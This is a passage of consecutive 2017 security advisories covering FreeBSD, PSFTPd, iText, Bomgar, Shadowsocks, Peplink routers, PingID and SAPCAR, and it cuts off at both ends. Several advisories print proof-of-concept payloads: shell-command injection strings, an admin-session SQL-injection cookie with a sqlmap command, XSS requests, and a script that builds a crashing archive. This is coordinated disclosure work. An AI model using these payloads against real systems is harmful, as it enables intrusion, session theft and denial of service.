10-STABLE] # fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.patch # fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.patch.asc # gpg --verify shm-10.patch.asc [FreeBSD 10.3] # fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.3.patch # fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.3.patch.asc # gpg --verify shm-10.3.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r325783 releng/10.3/ r325873 releng/10.4/ r325874 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision=NN> VII. References <URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1087> The latest revision of this advisory is available at <URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:09.shm.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEEHPf/b631yp++G4yy7Wfs1l3PaucFAloMxg1fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDFD RjdGRjZGQURGNUNBOUZCRTFCOENCMkVENjdFQ0Q2NURDRjZBRTcACgkQ7Wfs1l3P auciExAAhd9IcZrWpAqjKSGQWHrG7wJxrbCyyVVmZeoVQYQCihXJOnp+mhmVoJp5 zvyjIBG23F/dR8ukRO/LnqzM2bhCj7OcijlvZboH3L4os8iIeB2Tc6k9YlnFQeij wYK0CNnQjECf5S4OIBmQ+irpBYATZKk2EEDdmKDltcauSlIhJIzUedGdmMySOFzl jpx3+dHNb+D9v4luOgvF3mVTYPpjYmJ2HIYel3m0X
FreeBSD Security Advisory FreeBSD-SA-17:08.ptrace
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-17:08.ptrace Security Advisory The FreeBSD Project Topic: Kernel data leak via ptrace(PT_LWPINFO) Category: core Module: ptrace Announced: 2017-11-15 Credits:John Baldwin Affects:All supported versions of FreeBSD. Corrected: 2017-11-10 12:28:43 UTC (stable/11, 11.1-STABLE) 2017-11-15 22:39:41 UTC (releng/11.1, 11.1-RELEASE-p4) 2017-11-15 22:40:15 UTC (releng/11.0, 11.0-RELEASE-p15) 2017-11-10 12:31:58 UTC (stable/10, 10.4-STABLE) 2017-11-15 22:40:32 UTC (releng/10.4, 10.4-RELEASE-p3) 2017-11-15 22:40:46 UTC (releng/10.3, 10.3-RELEASE-p24) CVE Name: CVE-2017-1086 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. I. Background The ptrace(2) syscall provides the facility for a debugger to control the execution of the target process and to obtain necessary status information about it. The struct ptrace_lwpinfo structure is reported by one of the ptrace(2) subcommand and contains a lot of the information about the stopped thread (light-weight process or LWP, thus the name). II. Problem Description Not all information in the struct ptrace_lwpinfo is relevant for the state of any thread, and the kernel does not fill the irrelevant bytes or short strings. Since the structure filled by the kernel is allocated on the kernel stack and copied to userspace, a leak of information of the kernel stack of the thread is possible from the debugger. III. Impact Some bytes from the kernel stack of the thread using ptrace(PT_LWPINFO) call can be observed in userspace. IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-17:08/ptrace.patch # fetch https://security.FreeBSD.org/patches/SA-17:08/ptrace.patch.asc # gpg --verify ptrace.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r325643 releng/10.3/ r325871 releng/10.4/ r325870 stable/11/r325642 releng/11.0/ r325869 releng/11.1/ r325868 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision=NN> VII. References <URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1086> The latest revision of this advisory is available at <URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:08.ptrace.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEEHPf/b631yp++G4yy7Wfs1l3PaucFAloMxftfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDFD RjdGRjZGQURGNUNBOUZCRTFCOENCMkVENjdFQ0Q2NURDRjZBRTcACgkQ7Wfs1l3P audQ+hAA2+cjqNVUJ/Polwo9cu61QxKLEXO1DItlMIFWBxpFpXXlRSLbqH+RGmaO 6aR4Q1xcOnLm8e57KcLFppl77uOZyO0IJ0lyK6P30ouSxuYIW3aHbW+p3pVYBE+J aqF3mNxSh9xQRgXvxUB/CM3w/SMKkxX
Advisory X41-2017-006: Multiple Vulnerabilities in PSFTPd Windows FTP Server
X41 D-Sec GmbH Security Advisory: X41-2017-006 Multiple Vulnerabilities in PSFTPd Windows FTP Server = Overview Confirmed Affected Versions: 10.0.4 Build 729 Confirmed Patched Versions: None Vendor: Sergei Pleis Softwareentwicklung Vendor URL: http://www.psftp.de/ftp-server/ Vector: Network Credit: X41 D-Sec GmbH, Eric Sesterhenn, Markus Vervier Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-006-psftpd/ Summary and Impact -- Several issues have been identified, which allow attackers to hide information in log files, recover passwords and crash the whole server. It uses neither ASLR nor DEP to make exploitation harder. Product Description --- From the vendor page, roughly translated: PSFTPd is a userfriendly, functional and robust FTP server software with support for FTP, FTPS and SFTP. Use after free == Severity Rating: High Vector: Network CVE: CVE-2017-15271 CWE: 416 CVSS Score: 7.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Summary and Impact -- An invalid memory access issue could be triggered remotely in the SFTP component of PSFTPd. This issue could be triggered prior authentication. The PSFTPd server did not automatically restart, which enabled attackers to perform a very effective DoS attack against this service. By sending the following SSH identification / version string to the server, a NULL pointer dereference could be triggered: $ cat tmp.14 SSH-2.0- $ cat tmp.14 | socat - TCP:192.168.122.50:22 The issue appears to be a race condition in the window message handling, performing the cleanup for invalid connections. Upon further investigation X41 D-Sec GmbH could confirm that the accessed memory was already freed. X41 D-Sec GmbH enabled the memory debugging functionality page heap for the psftpd_svc.exe exeutable using the command “gflags.exe /p /disable psftpd_svc.exe /full”. When observing the crash in the WinDBG 19 debugging tool, it could be confirmed that access to an already freed page was taking place. Log Injection = Severity Rating: Medium Vector: Network CVE: CVE-2017-15270 CWE: 117 CVSS Score: 5.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Summary and Impact -- The PSFTPd server does not properly escape data before writing it into a Comma Separated Values (CSV) file. This can be used by attackers to hide data in the Graphical User Interface (GUI) view and create arbitrary entries to a certain extent. Special characters as '"', ',' and '\r' are not escaped and can be used to add new entries to the log. Workarounds --- None Passwords stored in Plain Text == Severity Rating: Low Vector: Local CVE: CVE-2017-15272 CWE: 312 CVSS Score: 3.3 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N Summary and Impact -- The PSFTPd server stores its configuration inside the PSFTPd.dat. This file is a Microsoft Access Database and can be extracted by using the command "mdb-export PSFTPd.dat USERS" from mdbtools (https://github.com/brianb/mdbtools). The application sets the encrypt flag with the password "ITsILLEGAL", but this is not required to extract the data. The users password is shown in clear text, since it is not stored securely. Workarounds --- Use the Active Directory connector for your users. FTP Bounce Scan === Severity Rating: Medium Vector: Network CVE: CVE-2017-15269 CWE: 441 CVSS Score: 5.0 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N Summary and Impact -- The PSFTPd server does not prevent FTP bounce scans by default. These can be performed using "nmap -b" and allow to perform scans via the FTP server. Workarounds --- It is possible to prevent FTP bounce scans by setting: Kontrollmanager > Domain > Sicherheit > Register "FTP Bounce and FXP" Workarounds --- None About X41 D-Sec GmbH X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline 2017-08-31 Issues found 2017-09-18 Vendor contacted 2017-09-19 Vendor reply 2017-10-11 CVE IDs requested 2017-10-11 CVE IDs assigned 2017-11-06 Vendor informed us, that apparently a fixed version was released. We cannot confirm, since we do not have access. 2017-11-07 Public release -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier signature.asc Description: OpenPGP digital signature
CVE-2017-9096 iText XML External Entity Vulnerability
## # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/en/research/advisories/ # ## # # Product: iText PDF Library # Vendor: iText Group # CVE ID: CVE-2017-9096 # CSNC ID: CSNC-2017-017 # Subject: XML External Entity Attack (XXE) # Risk: Medium # Effect: Remotely exploitable # Author: Benjamin Bruppacher <benjamin.bruppac...@compass-security.com> # Date: 2017-11-06 # ## Introduction: - iText is a software developer toolkit that allows users to integrate PDF functionalities within their applications, processes or products. The used XML parsers inside the library are not configured to disable external entities. This can be used for XML External Entity Attacks[1]. Affected versions: - Vulnerable: * 2.0.8 * 5.5.11 * 7.0.2 Not vulnerable: * 5.5.12 * 7.0.3 Technical Description - The attack can be carried out by submitting a malicious PDF to an iText application that parses XML data. By providing a malicious XXE payloads inside the XML data that resides in the PDF, an attacker can for example extract files or forge requests on the server. Timeline: - 2017-05-10: Discovery by Benjamin Bruppacher 2017-05-15: Initial vendor notification 2017-08-01: Vendor releases patch 2017-11-06: Disclosure of the advisory References: --- [1] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
Bomgar Remote Support - Local Privilege Escalation (CVE-2017-5996)
Virtual Security Research, LLC. https://www.vsecurity.com/ Security Advisory =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Advisory Name: Bomgar Remote Support - Local Privilege Escalation Release Date: 2017-10-26 Application: Bomgar Remote Support Versions: 15.2.x before 15.2.3 16.1.x before 16.1.5 16.2.x before 16.2.4 Severity: High/Medium Author: Robert Wessen Author: Mitch Kucia Vendor Status: Update Released [2] CVE Candidate: CVE-2017-5996 Reference: https://www.vsecurity.com/download/advisories/20171026-1.txt =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Product Description ~-~ From Bomgar's website [1]: "The fastest, most secure way for experts to access and support the systems that need them." Vulnerability Overview ~~ In mid-January, VSR identified a privilege escalation vulnerability in Bomgar Remote Support application which can be used to escalate from any unprivileged user to nt authority/system on Microsoft Windows 7 systems. The vulnerability originates from an nt authority/system service being executed from a folder with excessive permissions. The exploit requires a remote support agent to log into the affected system. Vulnerability Details ~---~ The Bomgar Remote Support agent enables remote support personnel to establish screen sharing, access command shell, and perform system administration tasks on machines with the agent installed. The agent, by default, creates a service as the Windows LocalSystem account and creates a folder at C:\ProgramData\bomgar-ssc-0x (where each h is a hex character). The agent is also executed from this folder, so the folder is included in the Windows dynamic library loader search path. The default permissions on the C:\ProgramData folder allow all users, even unprivileged ones, to append and write files. These permissions are inherited by sub-directories unless explicitly overridden. These permissions are not changed during the installation of the agent, so a DLL planting/hijack is possible. A Trojan horse with the same name as one of the requested, but not present libraries can be placed inside the C:\ProgramData\bomgar-ssc-0x folder since this folder is writeable by all users. When a remote support person attempts to connect to the host, the malicious library will be loaded and code can executed as nt authority/system. Versions Affected ~---~ The issue was originally discovered in version 16.1.1, although it likely exists since at least version 14. All testing was performed exclusively on Windows 7, however the vulnerability is suspected to be present on all supported Windows platforms. Vendor Response ~-~ The following timeline details Bomgar's response to the reported issue: 2017-02-05 VSR contacted Bomgar via several public email addresses to file a security report. 2017-02-06 Bomgar replied, VSR provided additional details on the vulnerability and Bomgar began internal triage. 2017-02-13 Bomgar confirmed reproduction and indicated a hotfix will be available to select customers on 2017-02-17. Patch for all customers will be available at a later date. 2017-03-28 Bomgar releases patch in Remote Support versions 15.2.3 [2], 16.1.5 [3], and 16.2.4 [4]. 2017-10-26 VSR advisory released. Recommendation ~~ Upgrade all client installs to the latest version of Bomgar Remote Support software as soon as possible. Common Vulnerabilities and Exposures (CVE) Information ~~ The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2017-5996 to this issue. This is a candidate for inclusion in the CVE list (https://cve.mitre.org), which standardizes names for security problems. Acknowledgments ~--~ Thanks to the Bomgar development team for a prompt response, confirmation, and patch. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= References: 1. https://www.bomgar.com/ 2. https://www.bomgar.com/support/changelog/remote-support-15-2-3 3. https://www.bomgar.com/support/changelog/remote-support-16-1-5 4. https://www.bomgar.com/support/changelog/remote-support-1624 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This advisory is distributed for educational purposes only with the sincere hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Neither Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or dama
Advisory X41-2017-010: Command Execution in Shadowsocks-libev
X41 D-Sec GmbH Security Advisory: X41-2017-010 Command Execution in Shadowsocks-libev == Overview Severity Rating: High Confirmed Affected Versions: 3.1.0 Confirmed Patched Versions: N/A Vendor: Shadowsocks Vendor URL: https://github.com/shadowsocks/shadowsocks-libev Vector: Local Credit: X41 D-Sec GmbH, Niklas Abel Status: Public CVE: not yet assigned Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-010-shadowsocks-libev/ Summary and Impact -- Shadowsocks-libev offers local command execution per configuration file or/and additionally, code execution per UDP request on 127.0.0.1. The configuration file on the file system or the JSON configuration received via UDP request is parsed and the arguments are passed to the "add_server" function. The function calls "construct_command_line(manager, server);" which returns a string from the parsed configuration. The string gets executed at line 486 "if (system(cmd) == -1) {", so if a configuration parameter contains "||evil command&&" within the "method" parameter, the evil command will get executed. The ss-manager uses UDP port 8830 to get control commands on 127.0.0.1. By default no authentication is required, although a password can be set with the '-k' parameter. Product Description --- Shadowsocks-libev is a lightweight secured SOCKS5 proxy for embedded devices and low-end boxes. The ss-manager is meant to control Shadowsocks servers for multiple users, it spawns new servers if needed. It is a port of Shadowsocks created by @clowwindy, and maintained by @madeye and @linusyang. Proof of Concept As passed configuration requests are getting executed, the following command will create file "evil" in /tmp/ on the server: nc -u 127.0.0.1 8839 add: {"server_port":8003, "password":"test", "method":"||touch /tmp/evil||"} The code is executed through shadowsocks-libev/src/manager.c. If the configuration file on the file system is manipulated, the code would get executed as soon as a Shadowsocks instance is started from ss-manage, as long as the malicious part of the configuration has not been overwritten. Workarounds --- There is no workaround available, do not use ss-manage until a patch is released. About X41 D-Sec GmbH X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline 2017-09-28 Issues found 2017-10-05 Vendor contacted 2017-10-09 Vendor contacted, replied to use GitHub for a full disclosure 2017-10-11 Vendor contacted, asked if the vendor is sure to want a full disclosure 2017-10-12 Vendor contacted, replied to create a public issue on GitHub 2017-10-13 Created public issue on GitHub 2017-10-13 Advisory release signature.asc Description: OpenPGP digital signature
Advisory X41-2017-008: Multiple Vulnerabilities in Shadowsocks
X41 D-Sec GmbH Security Advisory: X41-2017-008 Multiple Vulnerabilities in Shadowsocks === Overview Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6 Confirmed Patched Versions: N/A Vendor: Shadowsocks Vendor URL: https://github.com/shadowsocks/shadowsocks/tree/master Vector: Network Credit: X41 D-Sec GmbH, Niklas Abel Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-008-shadowsocks/ Summary and Impact -- Several issues have been identified, which allow attackers to manipulate log files, execute commands and to brute force Shadowsocks with enabled autoban.py brute force detection. Brute force detection from autoban.py does not work with suggested tail command. The key of captured Shadowsocks traffic can be brute forced. Product Description --- Shadowsocks is a fast tunnel proxy that helps you bypass firewalls. Log file manipulation = Severity Rating: Medium Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6 Confirmed Patched Versions: N/A Vector: Network CVE: not yet issued CWE: 117 CVSS Score: 4.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N Summary and Impact -- Log file manipulation is possible with a manipulated hostname, sent to the server from a client, even if Shadowsocks is as quiet as possible with "-qq". Therefore a string like "\nI could be any log entry\n" could be sent as hostname to Shadowsocks. The server would log an additional line with "I could be any log entry". Workarounds --- There is no workaround available, do not trust the logfiles until a patch is released. Command Execution = Severity Rating: Critical Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6 Confirmed Patched Versions: N/A Vector: Network CVE: not yet issued CWE: 78 CVSS Score: 9.0 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Summary and Impact -- When the brute force detection with autoban.py is enabled, remote attackers are able to execute arbitrary commands. Command execution is possible because of because of line 53 "os.system(cmd)" in autoban.py, which executes "cmd = 'iptables -A INPUT -s %s -j DROP' % ip". The "ip" parameter gets parsed from the log file, whose contents can be controlled by a third party sending unauthenticated packets. Proof of Concept When, a string like "can not parse header when ||ls&:\n" is sent as host name to Shadowsocks, it would end up in the logfile and lead to the execution of "ls". Autoban.py does not execute commands with spaces due to internal sanitization. A requested hostname like: " can not parse header when ||ls&:\ntouch /etc/evil.txt\nexit\ncan not parse header when ||/bin/bashhttps://github.com/shadowsocks/shadowsocks/wiki/Ban-Brute-Force-Crackers. The command "python autoban.py < /var/log/shadowsocks.log" does work, but the suggested "nohup tail -F /var/log/shadowsocks.log | python autoban.py > log 2>log &" does not block IP's. The "for line in sys.stdin:" from autoban.py parses the input until there is an end of file (EOF). As "tail -F" will never pipe an EOF into the pyhon script, the sys.stdin will block the script forever. So the "tail -F /var/log/shodowsocks | autoban.py" will never block anything except itself. Workarounds --- Use python "autoban.py < /var/log/shadowsocks.log" in a cronjob. Do not use autoban.py until the command execution issue gets fixed. Bruteforcable Shadowsocks traffic because of MD5 Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6 Confirmed Patched Versions: N/A Summary and Impact -- Shadowsocks uses no brute force prevention for it's key derivation function. The key for Shadowsocks traffic encryption is static and derived from the password, using MD5. The password derivation is in encrypt.py in line 56 to 63: " while len(b''.join(m)) < (key_len + iv_len): md5 = hashlib.md5() data = password if i > 0: data = m[i - 1] + password md5.update(data) m.append(md5.digest()) i += 1 " MD5 should not be used to generate keys, since it is a hash function. A proper key derivation function increases the costs for this operation, which is a small burden for a user, but a big one for an attacker, which performs this operation many more times. As passwords usually have low-entropy, a good password derivation function has to be slow. Workarounds --- Use a secure password generated by a cryptographically secure random generator. Wait for a patch that uses a password based key derivation function like "Argon2" instead of a hash. About X41 D-S
X41-2017-005 - Multiple Vulnerabilities in peplink balance routers
X41 D-Sec GmbH Security Advisory: X41-2017-005 Multiple Vulnerabilities in peplink balance routers === Overview Confirmed Affected Versions: 7.0.0-build1904 Confirmed Patched Versions: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin Vulnerable Firmware: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin Models: Balance Routers 305, 380, 580, 710, 1350, 2500 Vendor: Peplink Vendor URL: https://www.peplink.com/ Vector: Network Credit: X41 D-Sec GmbH, Eric Sesterhenn Additional Credits: Claus Overbeck (Abovo IT) Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/ Summary and Impact -- Several issues have been identified, which allow attackers to access the administrative web interface with admin credentials, delete files, perform CSRF and XSS attacks. Product Description --- From the vendor webpage: Use Load Balancing and SpeedFusion bandwidth bonding to deliver superfast VoIP, video streaming, and data using an SD-WAN enabled network. Even with a basic Balance 20 dual-WAN router, you can mix different transport technologies and providers to keep your network up when individual links go down. Switching between links is automatic and seamless. SQL Injection via bauth Cookie == Severity Rating: Critical Vector: Network CVE: CVE-2017-8835 CWE: 89 CVSS Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Summary and Impact -- Peplink devices are vulnerable to an SQL injection attack via the bauth cookie parameter which is set e.g. when accessing https://ip/cgi-bin/MANGA/admin.cgi. The injection can be checked with the following command: ./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi; --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" -p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ --flush-session -t trace.log --prefix "'" --suffix "--" -a The vulnerability in the Peplink device allows to access the SQLite session database containing user and session variables. By using the the following cookie in a web request, it is possible to select a running administrator session to be used for the attackers login. bauth=-12' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') or '1'='2 By forming specialised SQL queries, it is possible to retrieve usernames from the database. This worked by returning a valid session in case the username existed and no session if it did not exist. In the first case the server did not set a new session cookie in the response to the request. SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='username' and substr(v.value,1,3)='adm') Workarounds --- Install vendor supplied update. No CSRF Protection == Severity Rating: Medium Vector: Network CVE: CVE-2017-8836 CWE: 352 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact -- The CGI scripts in the administrative interface are not protected against cross site request forgery attacks. This allows an attacker to execute commands, if a logged in user visits a malicious website. This can for example be used to change the credentials of the administrative webinterface. Workarounds --- Install vendor supplied update. Passwords stored in Cleartext = Severity Rating: Medium Vector: Network CVE: CVE-2017-8837 CWE: 256 CVSS Score: 4.0 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact -- The Peplink devices store passwords in cleartext in the files /etc/waipass and /etc/roapass. In case one of these devices is compromised the attacker can gain access to the cleartext passwords and abuse them to compromise further systems. Workarounds --- Install vendor supplied update. XSS via syncid Parameter Severity Rating: Medium Vector: Network CVE: CVE-2017-8838 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact -- If the webinterface is accessible, it is possible to abuse the syncid parameter to trigger a cross-site-scripting issue by calling https://ip/cgi-bin/HASync/hasync.cgi?debug=1=123%3Cscript%3Ealert%281%29%3C/script%3E This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds --- Install vendor supplied update. XSS via preview.cgi === Severity Rating: Medium Vector: Network CVE: CVE-2017-8839 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact -- If the webint
PingID (MFA) - Reflected Cross-Site Scripting
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: PingID (MFA) [1] # Vendor: Ping Identity Corporation # CSNC ID: CSNC-2017-013 # Subject: Reflected Cross-Site Scripting # Risk:High # Effect: Remotely exploitable # Author: Stephan Sekula <stephan.sek...@compass-security.com> # Date: 18.04.2017 # # Introduction: - With PingID MFA, you can easily control when your users need to authenticate with a second factor. You can configure your policies based upon the following: Group - Require MFA for members of a specific group. Application - Require MFA for specific applications. Geofence - Require MFA if the user is outside a pre-set geofence. Rooted or Jailbroken device - Require MFA if the user's device is rooted or jailbroken. Network IP - Require MFA if the device isn't in a specific IP range. PingID MFA delivers the granular security that your policies require with the ease of use your users want. [1] Compass Security discovered a web application security flaw in PingID's authentication process, which allows an attacker to manipulate the resulting website. This allows, for instance, attacking the user's browser or redirecting the user to a phishing website. Technical Description - During the authentication process, a message parameter is used, which can be manipulated. If this parameter contains JavaScript code, it is executed in the user's browser. Exploiting the vulnerability will lead to so-called Cross-Site Scripting (XSS), allowing the execution of JavaScript in the context of the victim. Request: POST /pingid/ppm/auth/otp HTTP/1.1 Host: authenticator.pingone.com [CUT] Referer: https://authenticator.pingone.com/pingid/ppm/auth/otp Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 44 otp=123456=alert(0) Response: HTTP/1.1 200 OK Date: Thu, 13 Apr 2017 11:21:45 GMT Server: Cache-Control: no-cache, no-store [CUT] Connection: close X-Content-Type-Options: nosniff Content-Length: 8313 [CUT] [CUT] alert(0) [CUT] Workaround / Fix: - The vendor has addressed the vulnerability. In general, this issue can be fixed by properly encoding all output, which is posted back to the user. For instance, using HTML encoding, to convert < to and > to . Timeline: - 2017-05-16: Coordinated public disclosure date 2017-05-03: Release of fixed version/patch 2017-04-20: Initial vendor response 2017-04-19: Initial vendor notification 2017-04-13: Discovery by Stephan Sekula References: --- [1] https://www.pingidentity.com/en/products/pingid.html
[CORE-2017-0001] - SAP SAPCAR Heap Based Buffer Overflow Vulnerability
1. *Advisory Information* Title: SAP SAPCAR Heap Based Buffer Overflow Vulnerability Advisory ID: CORE-2017-0001 Advisory URL: http://www.coresecurity.com/advisories/sap-sapcar- heap-based-buffer-overflow-vulnerability Date published: 2017-05-10 Date of last update: 2017-05-10 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Heap-based Buffer Overflow [CWE-122] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2017-8852 3. *Vulnerability Description* SAP [1] distributes software and packages using an archive program called SAPCAR [2]. This program uses a custom archive file format. A memory corruption vulnerability was found in the parsing of specially crafted archive files, that could lead to local code execution scenarios. 4. *Vulnerable Packages* SAPCAR archive tool version 721.510 Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* SAP published the following Security Notes: . 2441560 6. *Credits* This vulnerability was discovered and researched by Martin Gallo and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* This vulnerability is caused by a controlled heap buffer overflow when opening a specially crafted CAR archive file. The following python code can be used to generate an archive file that triggers the vulnerability: /- #!/usr/bin/env python from scapy.packet import Raw from pysap.SAPCAR import * # We write a file just to have some data to put into the archive with open("string.txt", "w") as fd: fd.write("Some string to compress") # Create a new SAP CAR Archive f = SAPCARArchive("poc.car", mode="wb", version=SAPCAR_VERSION_200) # Add the text file f.add_file("string.txt") # Replace the blocks in the compressed file with the faulty blocks f._sapcar.files0[0].blocks.append(Raw("D>" + "\x00"*30 + "\x00\xff")) f._sapcar.files0[0].blocks.append(Raw("A" * 0x)) # Write the file f.write() $ ./SAPCAR -tvf poc.car SAPCAR: processing archive poc.car (version 2.00) -rw-rw-r-- 2309 Feb 2017 18:12 string.txt Segmentation fault (core dumped) -/ The CAR archive files in its version 2.00 are comprised of an archive header and a list of archived files [3]. Each archived file has a header containing the file's metadata, and the content of the file is split among several blocks. When the SAPCAR program opens a file containing an archived file block different than the known ones [4], it reads an additional 32 bytes of file metadata. The program then uses the last two bytes of the data read as a size field, and copies that amount of data into a fixed- length buffer previously allocated in the heap. As the length field is not properly validated, the operation results in a heap-based buffer overflow. It's worth mentioning that signature validation doesn't prevent the vulnerability to be triggered, as the signature file needs to be extracted from the archive file in order for the validation to be performed. 8. *Report Timeline* 2017-02-15: Core Security sent an initial notification to SAP. 2017-02-16: SAP confirmed the reception of the email and requested the draft version of the advisory. 2017-02-16: Core Security sent SAP a draft version of the advisory and informed them we would adjust our publication schedule according with the release of a solution to the issues. 2017-02-17: SAP confirmed reception of the draft advisory and assigned the incident ticket 1780137949 for tracking this issue. They will answer back once the team analyze the report. 2017-03-06: Core Security asked SAP for news about the advisory and publication date. 2017-03-08: SAP answered back saying they had troubles generating the SAPCAR archive. They asked for a pre-built one. 2017-03-08: Core Security researcher sent a PoC SAPCAR archive that can trigger the vulnerability. SAP confirmed reception. 2017-03-08: SAP asked for GPG key for one of the researchers involved in the discovery. Core Security sent (again) the key. SAP confirmed reception. 2017-03-13: SAP confirmed they could reproduce the vulnerability. They said they cannot commit to a publication date yet, but they aim at May 9th, although it could fall in April Patch day or postpone after May. 2017-03-13: Core Security thanked SAP for the tentative date and informed them we would publish our security advisory accordingly upon their confirmation. 2017-04-03: Core Security asked SAP for an update about the final publication date for this vulnerability's patch. 2017-04-05: SAP confirmed they will be able to release the fix in May, although there could be chances 